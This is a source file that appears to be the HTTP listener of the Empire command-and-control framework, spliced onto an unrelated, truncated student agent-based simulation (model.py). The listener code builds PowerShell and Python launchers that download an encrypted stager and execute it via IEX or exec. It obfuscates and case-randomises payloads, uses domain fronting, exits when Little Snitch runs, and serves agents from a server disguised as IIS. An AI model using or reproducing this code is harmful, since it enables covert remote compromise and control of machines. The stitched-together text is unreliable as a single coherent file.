routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
stager = helpers.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = helpers.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
model.py
|
"""
-*- coding: utf-8 -*-
Python Version: 3.6
Course: GEOG5790M Programming-for-Spatial-Analysts-Advanced-Skills
Author: Annabel Whipp
File name: model.py
"""
# imports
from landscape import Landscape
from agent import Agent
import random
import multiprocessing
class Model :
def task(self, node, number_of_nodes, pipes):
width = 10 # Landscape width
height = 10 # Landscape height
densitylimit = 50 # Density above which agents move.
number_of_agents = 1000
node_number_of_agents = 0
iterations = 100 # Model iterations before stopping
agents = []
# Setup landcsape.
landscape = Landscape()
landscape.width = width
landscape.height = height
pipe_to_zero = None
# Setup agents
if (node != 0):
node_number_of_agents = int(number_of_agents/(number_of_nodes - 1))
if (node == (number_of_nodes - 1)):
node_number_of_agents = int(node_number_of_agents + (number_of_agents % (number_of_nodes - 1)))
pipe_to_zero = pipes[node - 1]
for i in range (node_number_of_agents):
agents.append(Agent())
agents[i].densitylimit = densitylimit
agents[i].landscape = landscape # Agents get a reference to the
# landscape to interrogate for densities.
# They could also get a reference to the
# agent list if agents need to talk,
# but here they don't.
# Allocate agents a start location.
x = int(width/2) # Set to middle for start
y = int(height/2) # Set to middle for start
agents[i].x = x
agents[i].y = y
# Give the landscape a reference to the agent list so it
# can find out where they all are and calculate densities.
landscape.agents = agents
# Print start map
# Run
for time in range(iterations):
# Send out the local densities to node zero
if (node != 0):
landscape.calc_densities()
densities = landscape.getdensities()
pipe_to_zero.send(densities)
else : # if node is node zero
# Get the local densities in to node zero
densities = []
for x in range(width):
for y in range(height):
densities.append(0)
for i in range (len(pipes)):
# Get the local density from each node i.
local_densities = pipes[i].recv()
# Add node i's density surface to the global surface.
for x in range(width):
for y in range(height):
densities[(y*width) + x] = densities[(y*width) + x] + local_densities[(y*width) + x]
# Send out the global densities to the nodes
if (node == 0):
for i in range (len(pipes)):
pipes[i].send(densities)
else:
# Receive the global densities from node zero.
global_densities = pipe_to_zero.recv()
landscape.setdensities(global_densities)
# Move the agents if the density is too high.
for i in range(node_number_of_agents):
agents[i].step()
# Report
if (node == 0) :
print("time = ", time, " -------------------")
landscape.setdensities(densities)
for x in range(width):
for y in range (height):
print(landscape.getdensityat(x,y), end=" ")
print("")
def main(self):
'''
This version is parallelised.
'''
number_of_nodes = multiprocessing.cpu_count()
processes = []
parent_pipes = []
child_pipes = []
# Make the communication pipes.
for i in range(1, number_of_nodes):
parent_conn, child_conn = multiprocessing.Pipe()
parent_pipes.append(parent_conn)
child_pipes.append(child_conn)
# Give node zero one end of the pipes and start it processing.
